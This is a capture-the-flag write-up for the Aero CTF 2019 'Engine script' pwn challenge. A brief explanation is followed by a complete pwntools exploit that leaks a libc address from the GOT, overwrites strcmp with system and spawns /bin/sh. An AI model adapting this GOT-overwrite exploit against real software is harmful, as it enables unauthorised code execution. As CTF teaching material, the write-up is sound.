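# Aero CTF 2019

###### tags: `2019 pwn challenge`

## Engine script

We are allowed to read and write data near the `.bss` section, one byte at a time, through a tiny "engine" that moves a data pointer. My solution was to:

1. leak a libc address (putchar's GOT entry)
2. overwrite strcmp's GOT entry with `system`
3. overwrite putchar's GOT entry with the address where we get to enter the password again
4. enter `/bin/sh` as the password and trigger `strcmp('/bin/sh', ....)`, which is now `system('/bin/sh', ....)`

Final script:

```python
from pwn import *

# context.log_level = 'DEBUG'
context.terminal = ['tmux', 'splitw', '-h']

# Run the binary against the challenge libc so that the symbol offsets we read
# from libc-2.27.so below match the library actually mapped in the process.
p = process('./es', env={'LD_PRELOAD': './libc-2.27.so'})
# gdb.attach(p, 'b fflush')
elf = ELF('./es')
libc = ELF('./libc-2.27.so')

# Non-PIE i386 binary, so these are fixed addresses.
stack_addr = 0x0804C0A0   # initial value of the engine's data pointer
stack_ptr = 0x0804C080    # the data-pointer variable itself (only logged)
main = 0x080492A7         # re-entry point: where the password prompt is reached
                          # (as used in the write-up; not necessarily the `main` symbol)

"""
Engine commands, one character each:
d -> stack_ptr--
u -> stack_ptr++
g -> *stack_ptr = char   (the char is taken from the input that follows)
p -> print(*stack_ptr)
"""

p.recvuntil(b'Login: ')
p.sendline(b'admin')
p.recvuntil(b': ')
p.sendline(b'password')

log.info('putchar: ' + hex(elf.got['putchar']))
log.info('stack: ' + hex(stack_ptr))

# The whole chain walks the pointer *downwards* from stack_addr, so both GOT
# entries must sit below it (and strcmp@GOT below putchar@GOT + 4).  If that
# is not the case the `b'd' * negative` terms silently become empty and the
# writes land somewhere else, so fail loudly instead.
if not (elf.got['strcmp'] <= elf.got['putchar'] + 4 <= stack_addr):
    log.error('GOT layout does not match the downward walk: putchar=%#x strcmp=%#x start=%#x'
              % (elf.got['putchar'], elf.got['strcmp'], stack_addr))

# make payload ------------------------------------------------------
cur_stk = stack_addr
# /bin/sh\x00 + address of /bin/sh
payload = b'g'

# Leak putchar@GOT: step to its highest byte, print it, then print the three
# lower bytes walking down.  Afterwards overwrite all four bytes (walking up)
# with `main`.
payload += b'd' * (cur_stk - elf.got['putchar'] - 3) + b'p' + b'dp' * 3
cur_stk = elf.got['putchar']
payload += b'gu' * 4
cur_stk += 4

# Walk down to strcmp@GOT and overwrite it with system.
payload += b'd' * (cur_stk - elf.got['strcmp'])
cur_stk = elf.got['strcmp']
payload += b'gu' * 4
cur_stk += 4
payload += b'p'

# send payload ----------------------------------------------------
p.recvuntil(b': ')
p.send(payload)

# Exactly four bytes of leak come back, most significant byte first.
# recvn() (not recv()) so a short read cannot silently truncate the leak.
leaked = p.recvn(4)
# The first byte received is not used as-is; it is replaced with 0xf7, the
# top byte libc is normally mapped at on 32-bit Linux.  (Why the received
# byte is unusable is not visible here -- presumably it is lost or mangled on
# the way out.)  This is a guess that only holds for the usual i386 mmap
# region; the page-alignment check below does not catch a wrong top byte.
libc_leak = u32((b'\xf7' + leaked[1:])[::-1]) - libc.sym['putchar']
if libc_leak & 0xfff:
    log.error('libc base %#x is not page-aligned - leak or symbol offsets are wrong' % libc_leak)
log.info(hex(libc_leak))

system = libc_leak + libc.sym['system']
log.info('system: ' + hex(system))

p.send(p32(main))    # consumed by the four 'g' writes over putchar@GOT
p.send(p32(system))  # consumed by the four 'g' writes over strcmp@GOT
p.sendline(b'/bin/sh')  # the "password" that strcmp (now system) receives
p.sendline(b'df')
p.interactive()
```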